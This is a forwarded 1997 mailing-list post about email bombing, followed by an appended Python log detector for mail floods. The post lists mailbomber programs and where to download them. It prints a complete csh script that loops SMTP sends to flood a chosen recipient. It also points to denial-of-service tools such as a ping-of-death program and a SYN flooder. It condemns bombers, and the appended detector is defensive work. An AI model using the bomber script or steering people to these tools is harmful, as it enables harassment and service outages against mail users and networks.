This was posted to Firewalls; I figured the folks here might be interested
in it, if for no other reason than to get some idea of what we're up
against...
-Brent
--- begin forwarded text
Date: Sat, 19 Apr 1997 18:34:27 -0700
From: Osiris <osiris@pacificnet.net>
Organization: Abode of the Dead
MIME-Version: 1.0
To: Warpy <warpy@null.net>
CC: Ashram Beachoo <swamie@usa.net>, firewalls@GreatCircle.COM
Subject: Re: Warpy the wimp and Mail Bombing (LONG)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk
Warpy wrote:
>
> Ummm, errr, ok. If I was out of line I apologise about my post. However
> from the way he wrote about email bombing it looked like he was interested
> in using it rather than preventing it. Had he written asking I am
> looking at how to PREVENT such email bombers as UpYours 4.0, then I
> wouldn't have cared a bit.
>
> And Wimpy? Are we still stuck in kindergarten here?
>
Perhaps he wanted to understand how such programs work, which ones were
available and whom they were written by. Since no one actually answered
the question (as off topic as it may be), perhaps I should. True, it's
off-topic, but it is better to send someone away with what they asked
for than have them return only to ask it again. The dope, therefore, is
as follows:
1. Entering the following strings into altavista.digital.com will get
you a wide range of such "programs":
upyours.exe (Windows/Windows95/WindowsNT)
upyours2.zip (Windows/Windows95/WindowsNT)
upyours3.zip (Windows/Windows95/WindowsNT)
kaboom!3.zip (Windows/Windows95/WindowsNT)
kaboom3.exe (Windows/Windows95/WindowsNT)
alanch10.zip (Windows/Windows95/WindowsNT)
avalanche20.zip (Windows/Windows95/WindowsNT)
avalanche.exe (Windows/Windows95/WindowsNT)
unabomb.zip (Windows/Windows95/WindowsNT)
unabomb.exe (Windows/Windows95/WindowsNT)
xmailb1.zip (Windows/Windows95/WindowsNT)
xmailb1.exe (Windows/Windows95/WindowsNT)
homicide.zip (Windows/Windows95/WindowsNT)
homicide.exe (Windows/Windows95/WindowsNT)
bombtrack.bin (MacOS)
flamethrower10b.sit.bin (MacOS)
Nearly all of these are available for download and examination at the
following location:
http://www.ilf.net/wilter/ehack/email/email/mail.html
Also, there is a page that rates each of these "bombers" according to
the page owner's unique specifications. It is a quick way to learn what
each one does. That page is located here:
http://main.succeed.net/~bbuster/hacking/email/
Mail servers of particular interest are these:
================================================================================
2. No special programming knowledge is required to create one on the UNIX
platform.
For example:
#!/bin/csh
# Anonymous Mailbomber
# do chmod u+rwx <filename> where filename is the name of the file that
# you saved it as.
#*** WARNING - THIS WILL CREATE AND DELETE A TEMP FILE CALLED
# "teltemp"
# IN THE DIRECTORY IT IS RUN FROM ****
clear
echo -n "What is the name or address of the smtp server ?"
set server = $<
#echo open $server 25 > teltemp
echo quote helo somewhere.com >> teltemp
#The entry for the following should be a single name (goober),
#not goober@internet.address.
echo -n "Who will this be from (e.g. somebody) ?"
set from = $<
echo quote mail from: $from >> teltemp
echo -n "Who is the lucky recipient (e.g. someone@somewhere) ? "
set name = $<
echo quote rcpt to: $name >> teltemp
echo quote data >> teltemp
echo quote . >> teltemp
echo quote quit >> teltemp
echo quit >> teltemp
echo -n "How many times should it be sent ?"
set amount = $<
set loop_count = 1
while ($loop_count <= $amount)
echo "Done $loop_count"
ftp -n $server 25 < teltemp
@ loop_count++
end
rm ./teltemp
echo $amount e-mails complete to $name from $from@$server
**** This was reportedly authored by a fellow called "CyBerGoat"
(PERL is actually quite suited to this type of task. It is also suited
for coding tools to defeat these types of irritating attacks.)
Special note: new types of email bombing utilities have been designed,
particularly with JavaScript. Here is one such utility:
http://main.succeed.net/~bbuster/hacking/bomb.html
Here, you will find another:
http://ally.ios.com/~cdcjdc19/bomb.htm
These are valuable because, unlike the Doze and MacOS ones, the source
is easily examined.
================================================================================
3. There are several documents that discuss the subject. Here are some
that treat both bombing and forging:
**E-Mail Bombing and Spamming**
What is E-Mail Spamming?
What is E-Mail Bombing?
What can be done about it?
Last Date of Apparent Modification: November 25, 1996
Author: Byron Palmer
Location: http://mwir.lanl.gov:8080/E-Mail_Spamming.html and also:
http://wsspinfo.cern.ch/sec/cert/tech_tips/email_bombing_spamming
**Spoofed/Forged Email**
CERT/Carnegie Mellon University
Last Date of Apparent Modification: No Date Given
Location: ftp://info.cert.org/pub/tech_tips/email_spoofing
**E-Mail Bombs and Journalists**
Author: Steve Outing
Last Date of Apparent Modification: Friday, January 10, 1997
Location: http://www.mediainfo.com/ephome/news/newshtm/stop/st011097.htm
**I'VE BEEN SPAMMED!**
Source: Time Magazine
Volume 147, No. 12
Author: PHILIP ELMER-DEWITT
Date: March 18, 1996
Location:
http://pathfinder.com/@@0vsMrwcAt6xCLcGD/time/magazine/domestic/1996/960318/technology.html
**Up Yours v2.0 FAQ**
Authors: GlobalKos
Last Date of Apparent Modification: No Date Given
Location: http://main.succeed.net/~bbuster/hacking/faq.txt
***E-Mail Bombing*** (Somewhat lame.)
WRAL News
Capitol Broadcasting Company
Location:
http://www.wral-tv.com/news/wral/datacenter/1997/0224-email-bombing/
================================================================================
Overview:
Email bombing and spamming suck the big, putrid weeny. Anyone who does
it is an asshole. However, there is no shortage of such persons. Many
groups maintain lists of such people. Here is one generated by the folks
at AOL:
http://www.idot.aol.com/preferredmail/
Many providers have also been identified as "Rogue" sites; sites that
allow or encourage spamming (and do not reprimand their users for
bombings). Here is a site that identifies those providers:
http://spam.abuse.net/spam//rogues.html
And, of course, for a historical perspective (though more of USENET
spams), you can always visit the Blacklist of Internet Advertisers,
which is located here:
http://math-www.uni-paderborn.de/~axel/BL/blacklist.html
Some more famous cases discussed there include:
L. Canter, M. Siegel (Canter and Siegel, Immigration Lawyers)
Jess Guim, Advanz Home Office Companion
TMI
Kevin Jay Lipsitz a.k.a. Krazy Kevin, Magazine Club Inquiry Center
Kim Kerns, Applied Information Technologies, Inc.
Cybergear
One extremely interesting document is Rahul Dhesi's Block list, which
contains a list of rules for filtering this crap. It is located here:
http://www.rahul.net/dhesi/nojunk.txt
Contained within that document is a series of patterns (the
implementation is PERL 5) that have been identified as being associated
with junk mail, bombing or whatever.
================================================================================
Special Tools Related to Bombing and/or Denial of Service:
**Tool: The Livingston Crasher**
Purpose: Crash any PortMaster
Location:
ftp://ftp.visi.com/users/sluggo/generic/Livingston%20Portmaster%20Exploit%20(Crasher).txt
Requirements: C Compiler; UNIX
Tool: win95ping.c (Ping of Death for UNIX)
Purpose: Blow a Doze box off the Net
Location: http://www.sophist.demon.co.uk/ping/pingprogram.html
Source: http://www.sophist.demon.co.uk/ping/ping.c
Requirements: C compiler, UNIX
Tool: syn_flood
Purpose: Flood a target with half open connections, overflowing the
queue
Location: http://jya.com/flood.txt
Source: http://jya.com/flood.txt
Requirements: C compiler, UNIX
(Author: Jason Fairlane)
The original question has now been answered.
--- end forwarded text
--
Brent Chapman Internet/intranet training and consulting,
Brent@GreatCircle.COM specializing in network design and security.
Great Circle Associates,Inc. Visit us at http://www.greatcircle.com/
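
A defender's view of the script in section 2, as an added example that is not part of the forwarded post: the script replays one envelope from one client many times, so counting deliveries per (client, recipient) pair in a sliding window flags it. The log format, addresses and thresholds below are constructed for illustration and do not match any particular MTA.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format (an assumption, not a real MTA's):
#   <ISO timestamp> client=<ip> from=<sender> to=<rcpt> size=<bytes>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) client=(?P<client>\S+) from=(?P<sender>\S*) "
    r"to=(?P<rcpt>\S+) size=(?P<size>\d+)$"
)

def parse(line):
    """Return (timestamp, client, recipient) or None for unparseable lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["client"], m["rcpt"].lower()

def detect_bombing(lines, threshold=5, window=timedelta(seconds=60)):
    """Map (client, rcpt) -> peak deliveries seen inside one window,
    for pairs that reach `threshold`. Assumes chronological log order."""
    recent = defaultdict(deque)   # per-pair timestamps still inside the window
    flagged = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue              # skip malformed lines instead of failing
        ts, client, rcpt = rec
        q = recent[(client, rcpt)]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()           # expire deliveries older than the window
        if len(q) >= threshold:
            key = (client, rcpt)
            flagged[key] = max(flagged.get(key, 0), len(q))
    return flagged

def sample_log():
    """Constructed sample: one burst, one normal sender, one junk line."""
    base = datetime(1997, 4, 19, 18, 0, 0)
    burst = [f"{(base + timedelta(seconds=2 * i)).isoformat()} "
             "client=192.0.2.10 from=somebody to=victim@example.org size=0"
             for i in range(8)]
    normal = [f"{(base + timedelta(minutes=10 * i)).isoformat()} "
              "client=198.51.100.7 from=alice@example.com to=bob@example.org size=2048"
              for i in range(3)]
    return burst + normal + ["garbage line"]

if __name__ == "__main__":
    print(detect_bombing(sample_log()))
```

The same counter can drive a temporary reject or tarpit for the offending client; keying on recipient alone also catches floods spread across several relays.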